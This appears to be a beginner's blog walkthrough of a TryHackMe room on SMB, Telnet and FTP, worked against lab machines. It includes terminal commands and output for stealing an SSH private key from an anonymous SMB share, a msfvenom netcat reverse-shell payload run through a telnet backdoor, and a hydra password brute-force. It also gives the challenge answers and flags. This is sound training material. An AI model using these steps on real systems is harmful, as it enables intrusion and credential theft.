[THM] Network Services

2024-06-24

I have been indecisive about choosing between TryHackMe and Hack The Box Academy. Both are great platforms for learning about cybersecurity, and I plan to use both. However, I think TryHackMe is more suitable for absolute beginners like me. While exploring their Network Services rooms, I found myself learning a lot, so I decided to make a post about them.

SMB (Server Message Block) Protocol

Understanding SMB

What does SMB stand for?

Server Message Block

What type of protocol is SMB?

resposne-request

What do clients connect to servers using?

TCP/IP

What systems does Samba run on?

Unix

Enumerating SMB

Conduct an nmap scan of your choosing, How many ports are open?

 1root@ip-10-10-210-52:~# nmap 10.10.190.95
 2
 3Starting Nmap 7.60 ( https://nmap.org ) at 2024-06-24 05:55 BST
 4Nmap scan report for ip-10-10-190-95.eu-west-1.compute.internal (10.10.190.95)
 5Host is up (0.00047s latency).
 6Not shown: 997 closed ports
 7PORT    STATE SERVICE
 822/tcp  open  ssh
 9139/tcp open  netbios-ssn
10445/tcp open  microsoft-ds
11MAC Address: 02:58:19:9C:D2:BD (Unknown)
12
13Nmap done: 1 IP address (1 host up) scanned in 1.76 seconds

What port is SMB running on?

139/445

 1root@ip-10-10-210-52:~# nmap -sV 10.10.190.95
 2
 3Starting Nmap 7.60 ( https://nmap.org ) at 2024-06-24 05:57 BST
 4Nmap scan report for ip-10-10-190-95.eu-west-1.compute.internal (10.10.190.95)
 5Host is up (0.00042s latency).
 6Not shown: 997 closed ports
 7PORT    STATE SERVICE     VERSION
 822/tcp  open  ssh         OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
 9139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
10445/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
11MAC Address: 02:58:19:9C:D2:BD (Unknown)
12Service Info: Host: POLOSMB; OS: Linux; CPE: cpe:/o:linux:linux_kernel
13
14Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
15Nmap done: 1 IP address (1 host up) scanned in 13.04 seconds

Let’s get started with Enum4Linux, conduct a full basic enumeration. For starters, what is the workgroup name?

WORKGROUP

1root@ip-10-10-210-52:~# enum4linux -a 10.10.190.95

1	Server               Comment
2	---------            -------
3
4	Workgroup            Master
5	---------            -------
6	WORKGROUP            POLOSMB

What comes up as the name of the machine?

POLOSMB

1	Server               Comment
2	---------            -------
3
4	Workgroup            Master
5	---------            -------
6	WORKGROUP            POLOSMB

What operating system version is running?

6.1

 1 ======================================
 2|    OS information on 10.10.190.95    |
 3 ======================================
 4Use of uninitialized value $os_info in concatenation (.) or string at /root/Desktop/Tools/Miscellaneous/enum4linux.pl line 464.
 5[+] Got OS info for 10.10.190.95 from smbclient:
 6[+] Got OS info for 10.10.190.95 from srvinfo:
 7	POLOSMB        Wk Sv PrQ Unx NT SNT polosmb server (Samba, Ubuntu)
 8	platform_id     :	500
 9	os version      :	6.1
10	server type     :	0x809a03

What share sticks out as something we might want to investigate?

profiles

 1 =========================================
 2|    Share Enumeration on 10.10.190.95    |
 3 =========================================
 4WARNING: The "syslog" option is deprecated
 5
 6	Sharename       Type      Comment
 7	---------       ----      -------
 8	netlogon        Disk      Network Logon Service
 9	profiles        Disk      Users profiles
10	print$          Disk      Printer Drivers
11	IPC$            IPC       IPC Service (polosmb server (Samba, Ubuntu))

Exploiting SMB

What would be the correct syntax to access an SMB share called “secret” as user “suit” on a machine with the IP 10.10.10.2 on the default port?

smbclient //10.10.10.2/secret -U suit -p 445

We can remotely access the SMB share using the syntax: smbclient //[IP]/[SHARE] followed by the tags: -U [name]: to specify the user -p [port]: to specify the port SMB default ports are 139 or 445

Let’s see if our interesting share has been configured to allow anonymous access, i,e it doesn’t require authentication to view the files. We can do this easily by:

using the username “Anonymous”
connecting to the share we found during the enumeration stage
and not supplying a password.

Does the share allow anonymous access? Y/N?

1root@ip-10-10-210-52:~# smbclient //10.10.190.95/profiles -U Anonymous
2WARNING: The "syslog" option is deprecated
3Enter WORKGROUP\Anonymous's password:
4Try "help" to get a list of possible commands.
5smb: \>

Great! Have a look around for any interesting documents that could contain valuable information. Who can we assume this profile folder belongs to?

John Cactus

 1smb: > more "Working From Home Information.txt"John Cactus,
 2
 3As you're well aware, due to the current pandemic most of POLO inc. has insisted that, wherever
 4possible, employees should work from home. As such- your account has now been enabled with ssh
 5access to the main server.
 6
 7If there are any problems, please contact the IT department at it@polointernalcoms.uk
 8
 9Regards,
10
11James
12Department Manager
13
14/tmp/smbmore.aObMlQ (END)

What service has been configured to allow him to work from home?

ssh

Okay! Now we know this, what directory on the share should we look in?

.ssh

This directory contains authentication keys that allow a user to authenticate themselves on, and then access, a server. Which of these keys is most useful to us?

id_rsa

1smb: \> cd .ssh
2smb: \.ssh\> ls
3  .                                   D        0  Tue Apr 21 12:08:23 2020
4  ..                                  D        0  Tue Apr 21 12:08:23 2020
5  id_rsa                              A     1679  Tue Apr 21 12:08:23 2020
6  id_rsa.pub                          N      396  Tue Apr 21 12:08:23 2020
7  authorized_keys                     N        0  Tue Apr 21 12:08:23 2020
8
9		12316808 blocks of size 1024. 7583712 blocks available

Download this file to your local machine, and change the permissions to “600” using “chmod 600 [file]”.

Now, use the information you have already gathered to work out the username of the account. Then, use the service and key to log-in to the server.

What is the smb.txt flag?

THM{smb_is_fun_eh?}

1smb: \.ssh\> get id_rsa
2getting file \.ssh\id_rsa of size 1679 as id_rsa (819.8 KiloBytes/sec) (average 819.8 KiloBytes/sec)
3smb: \.ssh\> exit
4root@ip-10-10-51-158:~# chmod 600 id_rsa

 1root@ip-10-10-51-158:~# ssh root@10.10.190.95 -i id_rsa
 2root@10.10.190.95's password:
 3
 4root@ip-10-10-51-158:~# ssh johncactus@10.10.190.95 -i id_rsa
 5Connection closed by 10.10.190.95 port 22
 6root@ip-10-10-51-158:~# ssh JohnCactus@10.10.190.95 -i id_rsa
 7Connection closed by 10.10.190.95 port 22
 8root@ip-10-10-51-158:~# ssh cactus@10.10.190.95 -i id_rsa
 9Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-96-generic x86_64)
10
11 * Documentation:  https://help.ubuntu.com
12 * Management:     https://landscape.canonical.com
13 * Support:        https://ubuntu.com/advantage
14
15  System information as of Mon Jun 24 05:55:20 UTC 2024
16
17  System load:  0.0                Processes:           93
18  Usage of /:   33.3% of 11.75GB   Users logged in:     0
19  Memory usage: 17%                IP address for eth0: 10.10.190.95
20  Swap usage:   0%
21
22
2322 packages can be updated.
240 updates are security updates.
25
26
27Last login: Tue Apr 21 11:19:15 2020 from 192.168.1.110
28cactus@polosmb:~$ ls
29smb.txt
30cactus@polosmb:~$ cat smb.txt
31THM{smb_is_fun_eh?}

Telnet

Understanding Telnet

What is Telnet?

Application Protocol

What has slowly replaced Telnet?

SSH

How would you connect to a Telnet server with the IP 10.10.10.3 on port 23?

telnet 10.10.10.3 23

The lack of what, means that all Telnet communication is in plain text?

Encryption

Enumerating Telnet

How many ports are open on the target machine?

1PORT     STATE SERVICE REASON         VERSION
28012/tcp open  unknown syn-ack ttl 64

What port is this?

This port is unassigned, but still lists the protocol it’s using, what protocol is this?

TCP

Now re-run the nmap scan, without the -p- tag, how many ports show up as open?

Based on the title returned to us, what do we think this port could be used for?

a backdoor

1PORT     STATE SERVICE VERSION
28012/tcp open  unknown
3| fingerprint-strings:
4|   DNSStatusRequest, DNSVersionBindReq, FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, Help, JavaRMI, Kerberos, LANDesk-RC, LDAPBindReq, LDAPSearchReq, LPDString, NCP, NULL, NotesRPC, RPCCheck, RTSPRequest, SIPOptions, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServer, X11Probe:
5|_    SKIDY'S BACKDOOR. Type .HELP to view commands

Who could it belong to? Gathering possible usernames is an important step in enumeration.

Skidy

Exploring Telnet

Great! It’s an open telnet connection! What welcome message do we receive?

SKIDY'S BACKDOOR

1root@ip-10-10-46-62:~# telnet 10.10.220.9 8012
2Trying 10.10.220.9...
3Connected to 10.10.220.9.
4Escape character is '^]'.
5SKIDY'S BACKDOOR. Type .HELP to view commands

Let’s try executing some commands, do we get a return on any input we enter into that telnet session? (Y/N)

Hmm… that’s strange. Let’s check to see if what we’re typing is being executed as a system command.

Start a tcpdump listener on your local machine.

1root@ip-10-10-46-62:~# sudo tcpdump ip proto\\icmp -i ens5
2tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
3listening on ens5, link-type EN10MB (Ethernet), capture size 262144 bytes

Now, use the command Ping [local THM ip] -c 1 through the telnet session to see if we’re able to execute system commands. Do we receive any pings? Note, you need to preface this with .RUN (Y/N)

1root@ip-10-10-46-62:~# telnet 10.10.220.9 8012
2Trying 10.10.220.9...
3Connected to 10.10.220.9.
4Escape character is '^]'.
5SKIDY'S BACKDOOR. Type .HELP to view commands
6.RUN ping 10.10.46.62 -c 1

1root@ip-10-10-46-62:~# sudo tcpdump ip proto\\icmp -i ens5
2tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
3listening on ens5, link-type EN10MB (Ethernet), capture size 262144 bytes
403:35:25.225403 IP ec2-13-214-173-166.ap-southeast-1.compute.amazonaws.com > ip-10-10-46-62.eu-west-1.compute.internal: ICMP echo reply, id 16509, seq 14618, length 8
503:36:25.256032 IP ip-10-10-220-9.eu-west-1.compute.internal > ip-10-10-46-62.eu-west-1.compute.internal: ICMP echo request, id 1319, seq 1, length 64
603:36:25.256083 IP ip-10-10-46-62.eu-west-1.compute.internal > ip-10-10-220-9.eu-west-1.compute.internal: ICMP echo reply, id 1319, seq 1, length 64

We’re going to generate a reverse shell payload using msfvenom. This will generate and encode a netcat reverse shell for us. here’s our syntax: msfvenom -p cmd/unix/reverse_netcat lhost=[local tun0 ip] lport=4444 R

-p = payload
host = our local host IP address (this is your machine’s IP address)
lport = the port to listen on (this is the port on your machine)
R = export the payload in raw format

What word does the generated payload start with?

mkfifo

1root@ip-10-10-46-62:~# msfvenom -p cmd/unix/reverse_netcat lhost=10.10.46.62 lport=4444 R
2[-] No platform was selected, choosing Msf::Module::Platform::Unix from the payload
3[-] No arch selected, selecting arch: cmd from the payload
4No encoder specified, outputting raw payload
5Payload size: 101 bytes
6mkfifo /tmp/loqsthl; nc 10.10.46.62 4444 0</tmp/loqsthl | /bin/sh >/tmp/loqsthl 2>&1; rm /tmp/loqsthl

Now all we need to do is start a netcat listener on our local machine. We do this using: nc -lvp [listening port]

What would the command look like for the listening port we selected in our payload?

nc -lvp 4444

Success!! What is the contents of flag.txt?

THM{y0u_g0t_th3_t3ln3t_fl4g}

1root@ip-10-10-46-62:~# telnet 10.10.220.9 8012
2Trying 10.10.220.9...
3Connected to 10.10.220.9.
4Escape character is '^]'.
5SKIDY'S BACKDOOR. Type .HELP to view commands
6.RUN mkfifo /tmp/loqsthl; nc 10.10.46.62 4444 0</tmp/loqsthl | /bin/sh >/tmp/loqsthl 2>&1; rm /tmp/loqsthl

1root@ip-10-10-46-62:~# nc -lvp 4444
2Listening on [0.0.0.0] (family 0, port 4444)
3Connection from ip-10-10-220-9.eu-west-1.compute.internal 57836 received!
4ls
5flag.txt
6cat flag.txt
7THM{y0u_g0t_th3_t3ln3t_fl4g}

FTP (File Transfer Protocol)

Understanding FTP

What communications model does FTP use?

client-server

What’s the standard FTP port?

How many modes of FTP connection are there?

The FTP server may support either Active or Passive connections, or both.

In an Active FTP connection, the client opens a port and listens. The server is required to actively connect to it.
In a Passive FTP connection, the server opens a port and listens (passively) and the client connects to it.

Enumerating FTP

Run an nmap scan of your choice.

How many ports are open on the target machine?

What port is ftp running on?

What variant of FTP is running on it?

vsftpd

Great, now we know what type of FTP server we’re dealing with we can check to see if we are able to login anonymously to the FTP server. We can do this using by typing FTP [IP] into the console, and entering “anonymous”, and no password when prompted.

What is the name of the file in the anonymous FTP directory?

PUBLIC_NOTICE.txt

 1root@ip-10-10-87-146:~# ftp 10.10.41.45
 2Connected to 10.10.41.45.
 3220 Welcome to the administrator FTP service.
 4Name (10.10.41.45:root): anonymous
 5331 Please specify the password.
 6Password:
 7230 Login successful.
 8Remote system type is UNIX.
 9Using binary mode to transfer files.
10ftp> ls
11200 PORT command successful. Consider using PASV.
12150 Here comes the directory listing.
13-rw-r--r--    1 0        0             353 Apr 24  2020 PUBLIC_NOTICE.txt
14226 Directory send OK.
15ftp>

What do we think a possible username could be?

Mike

 1ftp> get PUBLIC_NOTICE.txt
 2local: PUBLIC_NOTICE.txt remote: PUBLIC_NOTICE.txt
 3200 PORT command successful. Consider using PASV.
 4150 Opening BINARY mode data connection for PUBLIC_NOTICE.txt (353 bytes).
 5226 Transfer complete.
 6353 bytes received in 0.00 secs (226.4958 kB/s)
 7ftp> bye
 8221 Goodbye.
 9root@ip-10-10-87-146:~# ls
10burp.json   Desktop    Instructions  Postman            Rooms    thinclient_drives
11CTFBuilder  Downloads  Pictures      PUBLIC_NOTICE.txt  Scripts  Tools
12root@ip-10-10-87-146:~# cat PUBLIC_NOTICE.txt
13===================================
14MESSAGE FROM SYSTEM ADMINISTRATORS
15===================================
16
17Hello,
18
19I hope everyone is aware that the
20FTP server will not be available
21over the weekend- we will be
22carrying out routine system
23maintenance. Backups will be
24made to my account so I reccomend
25encrypting any sensitive data.
26
27Cheers,
28
29Mike

Exploiting FTP

What is the password for user “mike”?

password

 1root@ip-10-10-87-146:~# hydra -t 4 -l mike -P /usr/share/wordlists/rockyou.txt -vV 10.10.41.45 ftp
 2Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
 3
 4Hydra (http://www.thc.org/thc-hydra) starting at 2024-06-25 04:40:47
 5[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
 6[DATA] max 4 tasks per 1 server, overall 4 tasks, 14344398 login tries (l:1/p:14344398), ~3586100 tries per task
 7[DATA] attacking ftp://10.10.41.45:21/
 8[VERBOSE] Resolving addresses ... [VERBOSE] resolving done
 9[ATTEMPT] target 10.10.41.45 - login "mike" - pass "123456" - 1 of 14344398 [child 0] (0/0)
10[ATTEMPT] target 10.10.41.45 - login "mike" - pass "12345" - 2 of 14344398 [child 1] (0/0)
11[ATTEMPT] target 10.10.41.45 - login "mike" - pass "123456789" - 3 of 14344398 [child 2] (0/0)
12[ATTEMPT] target 10.10.41.45 - login "mike" - pass "password" - 4 of 14344398 [child 3] (0/0)
13[21][ftp] host: 10.10.41.45   login: mike   password: password
14[STATUS] attack finished for 10.10.41.45 (waiting for children to complete tests)
151 of 1 target successfully completed, 1 valid password found
16Hydra (http://www.thc.org/thc-hydra) finished at 2024-06-25 04:41:03

What is ftp.txt?

THM{y0u_g0t_th3_ftp_fl4g}

 1root@ip-10-10-87-146:~# ftp 10.10.41.45
 2Connected to 10.10.41.45.
 3220 Welcome to the administrator FTP service.
 4Name (10.10.41.45:root): mike
 5331 Please specify the password.
 6Password:
 7230 Login successful.
 8Remote system type is UNIX.
 9Using binary mode to transfer files.
10ftp> ls
11200 PORT command successful. Consider using PASV.
12150 Here comes the directory listing.
13drwxrwxrwx    2 0        0            4096 Apr 24  2020 ftp
14-rwxrwxrwx    1 0        0              26 Apr 24  2020 ftp.txt
15226 Directory send OK.
16ftp> get ftp.txt
17local: ftp.txt remote: ftp.txt
18200 PORT command successful. Consider using PASV.
19150 Opening BINARY mode data connection for ftp.txt (26 bytes).
20226 Transfer complete.
2126 bytes received in 0.00 secs (29.6273 kB/s)
22ftp> bye
23221 Goodbye.
24root@ip-10-10-87-146:~# cat ftp.txt
25THM{y0u_g0t_th3_ftp_fl4g}

#TryHackMe